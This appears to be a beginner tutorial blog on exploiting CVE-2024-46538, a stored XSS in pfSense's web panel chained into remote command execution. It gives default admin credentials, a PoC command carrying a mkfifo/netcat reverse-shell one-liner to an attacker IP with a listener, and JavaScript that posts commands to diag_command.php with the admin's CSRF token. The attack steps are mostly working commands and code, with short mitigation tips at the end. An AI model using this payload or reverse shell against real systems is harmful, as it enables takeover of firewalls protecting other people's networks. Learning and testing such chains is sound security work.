PfSense Stored XSS to Remote Code Execution (CVE-2024-46538)
This blog walks through a real-world example of how a stored Cross-Site Scripting (XSS) vulnerability in pfSense (CVE-2024-46538) can be turned into a Remote Code Execution (RCE) exploit. All steps are based on publicly available resources and are beginner-friendly.
What is pfSense?
pfSense is an open-source firewall and router software used to protect networks. It's like a gatekeeper for your internet connection, deciding what traffic to let in or block. Many small businesses and home labs use it for network control and security.
What is XSS and RCE?
- XSS (Cross-Site Scripting): Allows an attacker to inject malicious scripts into web pages viewed by others. In a stored XSS, the script stays saved in the system and is triggered every time someone views the affected page.
- RCE (Remote Code Execution): Lets an attacker run commands or scripts on a remote system. This is a critical issue—like handing someone remote access to your computer without permission.
Step-by-Step Exploitation
Step 1: Login to pfSense
Once pfSense is up and running, access the web GUI in your browser. Use the default credentials:
Username: admin
Password: pfsense
Step 2: Run the XSS Exploit
Now clone the GitHub repository and run the exploit file provided. It will inject a malicious XSS payload into pfSense.
After the script is executed, refresh the web interface. If successful, you’ll see the payload triggered on the browser.
Step 3: Escalate to Remote Code Execution
The XSS alone is dangerous, but here comes the twist—now we use the exploit to trigger a command that gives us full shell access. Think of it as hijacking the pfSense system remotely.
- Run the reverse shell using the GitHub PoC script:
- Set up a listener on your machine to catch the shell:
- Go back to the browser and refresh the vulnerable page to trigger the payload.
- Return to your terminal—congrats! You now have root access to pfSense:
python3 CVE-2024-46538.py -i admin -p pfsense -u http://192.168.1.223 -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.122 1234 >/tmp/f"nc -nlvp 1234
What’s Happening Behind the Scenes?
When the admin logs into the pfSense panel, the XSS script silently executes a command to give control to the attacker. The browser unknowingly sends the request with the admin's session, allowing it to run with full privileges.
Here's the exact JS exploit used to send a POST request to the command execution page:
var formData = new FormData();
formData.append("__csrf_magic", csrfMagicToken);
formData.append("txtCommand", "id");
formData.append("txtRecallBuffer", "id");
formData.append("submit", "EXEC");
formData.append("dlPath", "");
formData.append("ulfile", new Blob(), "");
formData.append("txtPHPCommand", "");
fetch("https://192.168.102.61/diag_command.php", {
method: "POST",
body: formData
}).then(response => response.text()).then(data => {
const parser = new DOMParser();
const doc = parser.parseFromString(data, "text/html");
const contentDiv = doc.querySelector("div.content");
if (contentDiv) {
alert(contentDiv.textContent);
} else {
alert("No content found");
}
});Summary
- You exploit a stored XSS in pfSense’s web panel.
- You chain it with a command injection to execute a reverse shell.
- With the reverse shell, you gain root access to the firewall system.
- A small web bug becomes a full system compromise if not patched.
Mitigation Tips
- Update pfSense to the latest version immediately.
- Never expose the web UI to the internet.
- Use multi-factor authentication (2FA).
- Review logs and block suspicious IPs regularly.
Security testing like this helps us identify and patch critical risks before attackers can abuse them. Stay curious, keep learning, and practice ethical hacking responsibly!